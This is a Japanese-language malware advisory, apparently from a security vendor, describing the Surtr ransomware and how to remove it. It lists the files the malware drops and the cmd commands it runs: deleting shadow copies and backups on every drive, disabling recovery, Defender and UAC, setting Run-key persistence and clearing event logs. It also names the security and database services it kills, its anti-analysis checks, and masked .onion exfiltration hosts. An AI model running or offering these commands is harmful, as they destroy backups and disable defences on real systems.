Ransom.Win64.SURTR.A
2022年1月20日
別名:
Ransom:Win64/Surtr.MK!MTB (MICROSOFT)
プラットフォーム:
Windows
危険度:
ダメージ度:
感染力:
感染確認数:
情報漏えい:
- マルウェアタイプ: 身代金要求型不正プログラム(ランサムウェア)
- 破壊活動の有無: なし
- 暗号化: はい
- 感染報告の有無: はい
概要
感染経路 インターネットからのダウンロード
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
身代金要求文書のファイルを作成します。 以下のファイル拡張子を持つファイルは暗号化しません。
詳細
ファイルサイズ 328,252 bytes
タイプ EXE
メモリ常駐 はい
発見日 2022年1月6日
ペイロード メッセージボックスの表示, サービスの無効, 情報収集, ファイルの暗号化, プロセスの強制終了, URLまたはIPアドレスに接続
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- C:\ProgramData\Service\SurtrIcon.ico
- C:\ProgramData\Service\SURTR_README.hta
- C:\ProgramData\Service\SURTR_README.txt
- C:\ProgramData\Service\BUs.surt
- C:\ProgramData\Service\ID_DATA.surt
- C:\ProgramData\Service\Private_DATA.surt
- C:\ProgramData\Service\Public_DATA.surt
- C:\ProgramData\Service\Service.surt
- C:\ProgramData\Service\SurtrBackGround.jpg
- C:\ProgramData\Service\SurtrIcon.ico
- {Encrypted Directory}\Private_DATA.surt
マルウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。
- C:\ProgramData\Service\Surtr.exe
マルウェアは、以下のプロセスを追加します。
- %System%\cmd.exe /c echo off
- %System%\cmd.exe /c chcp 437
- %System%\cmd.exe /c vssadmin Delete Shadows /all /quiet
- %System%\cmd.exe /c bcdedit /set {default} recoveryenabled No
- %System%\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
- %System%\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
- %System%\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
- %System%\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
- %System%\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
- %System%\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
- %System%\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
- %System%\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
- %System%\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
- %System%\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
- %System%\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
- %System%\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
- %System%\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
- %System%\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
- %System%\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
- %System%\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
- %System%\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
- %System%\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
- %System%\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
- %System%\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
- %System%\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
- %System%\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
- %System%\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
- %System%\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
- %System%\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
- %System%\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
- %System%\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
- %System%\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA/t REG_DWORD /d 0 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E}/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup/t REG_DWORD /d 1 /f
- %System%\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
- %System%\cmd.exe /c reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *test /t REG_SZ /d "bcdedit /deletevalue {current} safeboot" /f
- %System%\cmd.exe /c reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce /v *execute /t REG_SZ /d "
- %System%\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surt\UserChoice/v ProgId /t REG_SZ /d surt_auto_file /f
- %System%\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surt /ve /t REG_SZ /d surt_auto_file /f
- %System%\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surt_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr/t REG_DWORD /d 0 /f
- %System%\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun/t REG_DWORD /d 0 /f
- %System%\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
- %System%\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
- %System%\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
- %System%\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
- %System%\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
- %System%\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
- %System%\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
- %System%\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
- %System%\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
- %System%\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
- %System%\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
- %System%\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
- %System%\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
- %System%\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
- %System%\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
- %System%\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe/F
- %System%\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
- %System%\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
- %System%\cmd.exe /c attrib +R /S "%TEMP%\Service"
- %System%\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
- %System%\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico
- %System%\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"
- %System%\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"
- %System%\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
- %System%\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
- %System%\cmd.exe /c mshta C:\ProgramData\Service\SURTR_README.hta
- %System%\cmd.exe /c start C:\ProgramData\Service\SURTR_README.txt
- %System%\cmd.exe /c shutdown -r -f
(註:%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)
マルウェアは、以下のフォルダを作成します。
- C:\ProgramData\Service
- %temp%\Service\
マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。
- SurtrMUTEX
プロセスの終了
マルウェアは、感染コンピュータ上で確認した以下のサービスを終了します。
- Acronis VSS Provider
- Enterprise Client Service
- Sophos Agent
- Sophos AutoUpdate Service
- Sophos Clean Service
- Sophos Device Control Service
- Sophos File Scanner Service
- Sophos Health Service
- Sophos MCS Agent
- Sophos MCS Client
- Sophos Message Router
- Sophos Safestore Service
- Sophos System Protection Service
- Sophos Web Control Service
- SQLsafe Backup Service
- SQLsafe Filter Service
- Symantec System Recovery
- Veeam Backup Catalog Data Service
- AcronisAgent
- AcrSch2Svc
- Antivirus
- BackupExecJobEngine
- BackupExecManagementService
- BackupExecRPCService
- BackupExecVSSProvider
- EPSecurityService
- IISAdmin
- IMAP4Svc
- macmnsvc
- masvc
- MBAMService
- MBEndpointAgent
- McAfeeEngineService
- McAfeeFramework
- McAfeeFrameworkMcAfeeFramework
- McShield
- mfemms
- mfevtp
- MMS
- mozyprobackup
- MsDtsServer
- MsDtsServer100
- MsDtsServer110
- MSExchangeES
- MSExchangeIS
- MSExchangeMGMT
- MSExchangeMTA
- MSExchangeSA
- MSExchangeSRS
- MSOLAP$SQL_2008
- MSOLAP$SYSTEM_BGC
- MSOLAP$TPS
- MSOLAP$TPSAMA
- MSSQL$BKUPEXEC
- MSSQL$ECWDB2
- MSSQL$PRACTICEMGT
- MSSQL$PRACTTICEBGC
- MSSQL$PROFXENGAGEMENT
- MSSQL$SBSMONITORING
- MSSQL$SHAREPOINT
- MSSQL$SQL_2008
- MSSQL$SYSTEM_BGC
- MSSQL$TPS
- MSSQL$TPSAMA
- MSSQL$VEEAMSQL2008R2
- MSSQL$VEEAMSQL2012
- MSSQLFDLauncher
- MSSQLFDLauncher$PROFXENGAGEMENT
- MSSQLFDLauncher$SBSMONITORING
- MSSQLFDLauncher$SHAREPOINT
- MSSQLFDLauncher$SQL_2008
- MSSQLFDLauncher$SYSTEM_BGC
- MSSQLFDLauncher$TPS
- MSSQLFDLauncher$TPSAMA
- MSSQLSERVER
- MSSQLServerADHelper100
- MSSQLServerOLAPService
- MySQL80
- MySQL57
- OracleClientCache80
- PDVFSService
- POP3Svc
- ReportServer
- ReportServer$SQL_2008
- ReportServer$SYSTEM_BGC
- ReportServer$TPS
- ReportServer$TPSAMA
- RESvc
- sacsvr
- SamSs
- SAVAdminService
- SAVService
- Smcinst
- SmcService
- SMTPSvc
- SNAC
- SntpService
- sophossps
- SQLAgent$BKUPEXEC
- SQLAgent$ECWDB2
- SQLAgent$PRACTTICEBGC
- SQLAgent$PRACTTICEMGT
- SQLAgent$PROFXENGAGEMENT
- SQLAgent$SBSMONITORING
- SQLAgent$SHAREPOINT
- SQLAgent$SQL_2008
- SQLAgent$SYSTEM_BGC
- SQLAgent$TPS
- SQLAgent$TPSAMA
- SQLAgent$VEEAMSQL2008R2
- SQLAgent$VEEAMSQL2012
- SQLBrowser
- SQLSafeOLRService
- SQLSERVERAGENT
- SQLTELEMETRY
- SQLTELEMETRY$ECWDB2
- SQLWriter
- SstpSvc
- svcGenericHost
- tmlisten
- TrueKey
- UI0Detect
- VeeamBackupSvc
- VeeamBrokerSvc
- VeeamCatalogSvc
- VeeamCloudSvc
- VeeamDeploymentService
- VeeamDeploySvc
- VeeamEnterpriseManagerSvc
- VeeamMountSvc
- VeeamNFSSvc
- VeeamRESTSvc
- VeeamTransportSvc
- W3Svc
- wbengine
- WRSVC
- MSSQL$VEEAMSQL2008R2
- SQLAgent$VEEAMSQL2008R2
- VeeamHvIntegrationSvc
- swi_update
- SQLAgent$CXDB
- SQLAgent$CITRIX_METAFRAME
- SQLBackups
- MSSQL$PROD
- Zoolz2Service
- MSSQLServerADHelper
- SQLAgent$PROD
- msftesql$PROD
- NetMsmqActivator
- EhttpSrv
- ekrn
- ESHASRV
- MSSQL$SOPHOS
- SQLAgent$SOPHOS
- AVP
- klnagent
- MSSQL$SQLEXPRESS
- SQLAgent$SQLEXPRESS
- wbengine
- HvHost
- vmickvpexchange
- vmicguestinterface
- vmicshutdown
- vmicheartbeat
- vmcompute
- vmicvmsession
- vmicrdv
- vmictimesync
- vmicvss
- VMAuthdService
- VMnetDHCP
- VMwareNATService
- VMUSBArbService
- VMwareHostd
- Sense
- WdNisSvc
- WinDefend
マルウェアは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。
- MMS.EXE
- SCHEDUL12.EXE
- SCHEDHELP.EXE
- TIB_MOUNTER_MONITOR.EXE
- SQLIOSIM.EXE
- SQLAGENT.EXE
- SQLMAINT.EXE
- SQLSTUBSS.EXE
- CSRSS.EXE
- SQLCEIP.EXE
- MSTSC.EXE
- TASKMGR.EXE
- SQLSERVR.EXE
- QBIDPSERVICE.EXE
- SQLSERVER.EXE
- MSFTESQL.EXE
- SQLBROWSER.EXE
- SQLWRITER.EXE
- ORACLE.EXE
- OCSSD.EXE
- DBSNMP.EXE
- SYNCTIME.EXE
- MYDESKTOPQOS.EXE
- AGNTSVC.EXE
- ISQLPPLUSSVC.EXE
- ISQLPUSSVS.EXE
- XFSSVCCON.EXE
- MYDESKTOPSERVICE.EXE
- OCAUTOUPDS.EXE
- ENCSVC.EXE
- TBIRDCONFIG.EXE
- OCOMM.EXE
- MYSQLD.EXE
- MYSQLD-NT.EXE
- MYSQLD-OPT.EXE
- DBENG50.EXE
- SQBCORESERVICE.EXE
- EXCEL.EXE
- INFOPATH.EXE
- MSACCESS.EXE
- MSPUB.EXE
- ONENOTE.EXE
- OUTLOOK.EXE
- POWERPNT.EXE
- STREAM.EXE
- THEBAT.EXE
- THEBAT64.EXE
- THUNDERBIRD.EXE
- VISIO.EXE
- WINWORD.EXE
- WORDPAD.EXE
- NOTEPAD.EXE
- PAINT.EXE
- NOTEPAD++.EXE
- ENDNOTE.EXE
- VMWAREUSER.EXE
- VMWARESERVICE.EXE
- VBOXSERVICE.EXE
- VBOXTRAY.EXE
- SANDBIXIEDCOMLAUNCH.EXE
- VMTOOLSD.EXE
- NTOSKRNL.EXE
- CBSERVICE.EXE
- HTTPD.EXE
- JAVAW.EXE
- JAVA.EXE
- IPTRAY.EXE
- IPERIUS.EXE
- FILEZILLA.EXE
- DATACOLLECTORSVC.EXE
- EDGETRANSPORT.EXE
- ACROTRAY.EXE
- AGENT.EXE
- SAGECSCLIENT.EXE
- WSUSSERVICE.EXE
- SLACK.EXE
- NODE.EXE
- W3WP.EXE
- MYSQL.EXE
- MSMDSRV.EXE
- MSDTSSRVR.EXE
- FDLAUNCHER.EXE
- FDHOST.EXE
- SSMS.EXE
- REPORTINGSERVICESSERVICE.EXE
- DATACOLLECT.EXE
- SAGE.NA.AT_AU.SERVICE.EXE
- SAGE.NA.AT_AU.SYSTRAY.EXE
情報漏えい
マルウェアは、以下の情報を収集します。
- Generated ID
- OS
- Disk Space
- Username
- Hostname
- Surtr version
- Infected datetime
- keyboard
- Private key
- Filecount
- Encryption status
その他
マルウェアは、以下のWebサイトにアクセスして感染コンピュータのIPアドレスを収集します。
- ip-api.com - also includes Country code and region
マルウェアは、以下を実行します。
- Display The following Message box and terminate itself if the following condition is met:
- if Sandbox\Debugger is present:
- Message box title: SurtrRansomware
- Message box content : WARNING. SandBox/Debugger Detected !!!
- if executed in the following country :
- Iran
- Russia
- Ukraine
- Armenia
- Azerbaijan
- Turkmenistan
- Turkey
- Georgia
- Kazakhstan
- Tajikistan
- Uzbekistan
- Message box title: SurtrRansomware
- Message box content : WARNING. Surtr does not run in this country, if you do it again you will be banned.
- if the following process is running :
- WIRESHARK.EXE
- LORDPE.EXE
- PROCMON64.EXE
- PROCMON.EXE
- DIE.EXE
- XNTSV64.EXE
- XOCALC.EXE
- XVLK.EXE
- NFD.EXE
- PROCESSHACKER.EXE
- PDBRIPPER.EXE
- IDA64.EXE
- IDA.EXE
- IMMUNITYDEBUGGER.EXE
- GHIDRA.EXE
- X32DBG.EXE
- X64DBG.EXE
- OLLYDBG.EXE
- Message box title: SurtrRansomware
- Message box content : Analyzer Proccess Detected !!!
- if the config is bad
- Message box title: SurtrRansomware
- Message box content : WARNING. Bad Config.
- Display The following Message box after encryption
- Message box title: SurtrRansomware
- Message box content : Encryption Complete.
- It enumerates and clear logs via wevtutil
- It encrypts files found in the following drives:
- Removable Drive
- Fixed Drive
- Network Drive
- RAM Disks
- It sends the gathered information to the following URL:
- {BLOCKED}6mle3zxux6vpftyuezxhmad.onion.pe
- {BLOCKED}6vq3jo6mle3zxux6vpftyuezxhmad.onion.ly
- It restarts the affected machine after encrypting
- It changes the desktop wallpaper
ランサムウェアの不正活動
マルウェアは、ファイル名に以下の文字列を含むファイルの暗号化はしません。
- Windows
- WINDOWS
- windows
- Windows Kits
- Chrome
- FireFox
- $Mft
- Internet Explorer
- NTUSER.DAT
- win.ini
- UsrClass.dat
- pagefile.sy
- hiberfil.sys
- DumpStack.log.tmp
- Config.Msi
- boot
- Boot
- SURTR
- surtr
- Surtr
マルウェアは、以下のフォルダ内で確認されたファイルの暗号化はしません。
- C:\Program Files\WindowsApps
- C:\Program Files (x86)\Dropbox
- C:\ProgramData\Dropbox
- \AppData\Local\Dropbox
マルウェアは、暗号化されたファイルのファイル名に以下の拡張子を追加します。
- .[DecryptMyData@mailfence.com].SURT
マルウェアが作成する以下のファイルは、脅迫状です。
- {Encrypted Directory}\SURTR_README.hta
- {Encrypted Directory}\SURTR_README.txt
以下のファイル拡張子を持つファイルについては暗号化しません:
- .exe
- .surt
対応方法
対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 17.326.06
初回 VSAPI パターンリリース日 2022年1月19日
VSAPI OPR パターンバージョン 17.327.00
VSAPI OPR パターンリリース日 2022年1月20日
手順 1
トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。
- Troj.Win32.TRX.XXPE50FFF051
手順 2
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 3
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 4
Windowsをセーフモードで再起動します。
[ 詳細 ]
手順 5
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
- Task Name: svchos1
Task to be run: C:\ProgramData\Service\Surtr.exe
- Task Name: svchos2
Task to be run: C:\ProgramData\Service\Surtr.exe
- Task Name: exp
Task to be run: C:\Windows\explorer.exe
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
- 上記の{タスク名} を、[名前]の欄に入力します。
- 入力した{タスク名} 持つファイルを右クリックします。
- [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
- 上記の{実行するタスク}と文字列が一致するタスクを削除します。
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
- 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
- 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
- 文字列が一致するタスクを削除します。
手順 6
このレジストリ値を削除します。
[ 詳細 ]
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
